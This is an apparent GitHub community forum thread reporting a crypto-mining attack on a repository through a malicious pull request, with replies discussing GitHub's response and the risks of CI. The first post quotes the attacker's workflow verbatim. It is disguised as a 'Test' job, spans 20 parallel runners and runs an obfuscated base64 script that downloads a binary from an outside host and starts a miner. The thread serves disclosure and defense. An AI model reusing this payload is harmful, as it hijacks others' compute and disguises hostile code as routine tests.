Crypto-mining attack in my github actions through pull request

Code to Cloud GitHub Actions
#1

Hello,

Some days ago, a github user attacked one of my github repository with a malicious pull request to trigger crypto-mining in my github actions. The pull request was opened/closed multiple times and each action was starting up to 20 sub-jobs.

I was alerted very quickly and stopped the jobs and closed the PR immediately.

I wrote a blog post that relates the whole story and gives full details: Github Actions mining attack through Pull Request

It is similar to Massive Cryptomining Campaign Abusing GitHub (…) but differs completely in the implementation.

I already reported to GitHub through contact form.

The malicious action looked like this:

name: Test
 on: [pull_request]
 jobs:
   test:
     name: Fetch
     runs-on: ubuntu-latest
     container: ubuntu:20.10
     env:
       DEBIAN_FRONTEND: noninteractive
     strategy:
       fail-fast: false
       matrix:
         runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
     steps:
       - run: |
           eval "$(echo "YXB0IHVwZGF0ZSAtcXEKYXB0IGluc3RhbGwgLXkgY3VybCBnaXQganEKY3VybCAtTGZvIHByb2cgaHR0cHM6Ly9naXRodWIuY29tL2JocmlzY2FybmF0dC9maXJzdC1yZXBvL3JlbGVhc2VzL2Rvd25sb2FkL2EvcHJvZyB8fCBjdXJsIC1MZm8gcHJvZyBodHRwczovL3RyYW5zZmVyLnNoL09TUGpLL3Byb2cKaXA9JChjdXJsIC1zIC1IICdhY2NlcHQ6IGFwcGxpY2F0aW9uL2Rucy1qc29uJyAnaHR0cHM6Ly9kbnMuZ29vZ2xlL3Jlc29sdmU/bmFtZT1wb29saW8ubWFncmF0bWFpbC54eXomdHlwZT1BJyB8IGpxIC1yICcuQW5zd2VyWzBdLmRhdGEnKQpjaG1vZCB1K3ggcHJvZwp0aW1lb3V0IDRoIC4vcHJvZyAtbyAiJHtpcH06MzAwMCIgLXUgQ2hyaXNCYXJuYXR0IC1wIEV4cGxhaW5pbmdDb21wdXRlcnMgLS1jcHUtcHJpb3JpdHkgNSA+IC9kZXYvbnVsbAo=" | base64 -d)"
2 Likes
#2

:wave: Welcome!

I’m sorry that happened. I’ve had a look and your ticket has been worked on by a couple of different teams. That sometimes delays a reply, but I can assure you they’re handling it!

1 Like
#3

I got an answer from support, they confirmed that these kind of attacks happens and they took countermeasures quickly even before I reported it (that was them that flagged and removed the nasty user and pull request).

Thank you @canuckjacq and all !

4 Likes
#4

Thanks for the update and I’m really glad to hear that. I know these attacks can be alarming.

2 Likes
#5

Glad it got resolved and that it was a proactive response.

This is a good reminder on what our interface of our modern CI, the risk that it poses, and why we need to safeguard it. CI systems are Remote Code Execution as a service, nothing more nothing less. It has a (useful) side effect of being a great way to execute tests, that is the common use case rather than the only one.

1 Like
#6

I’m confused how this is an “attack”, or at least who it’s attacking.

GitHub, in their, uh, infinite wisdom, seems to have given the whole internet the ability to submit a shell script that they will run on an arbitrary number VMs, just by making a free, anonymous account and submitting a PR to any repo. As far as I can tell, the script doesn’t have access to modify your repo or use its / your credentials. It’s just doing what GitHub advertises: running arbitrary code in response to an action. (That code happens to be dumb and wasteful, but GH doesn’t prevent that.)

#7

It’s primarily an attack against Github, wasting their resources for creating cryptocurrency. The effect on the repository owner is more like spam, but that’s bad enough already.

3 Likes
#8

It would be nice to exclude folders like .github from pull requests opened by non-collaborators.

2 Likes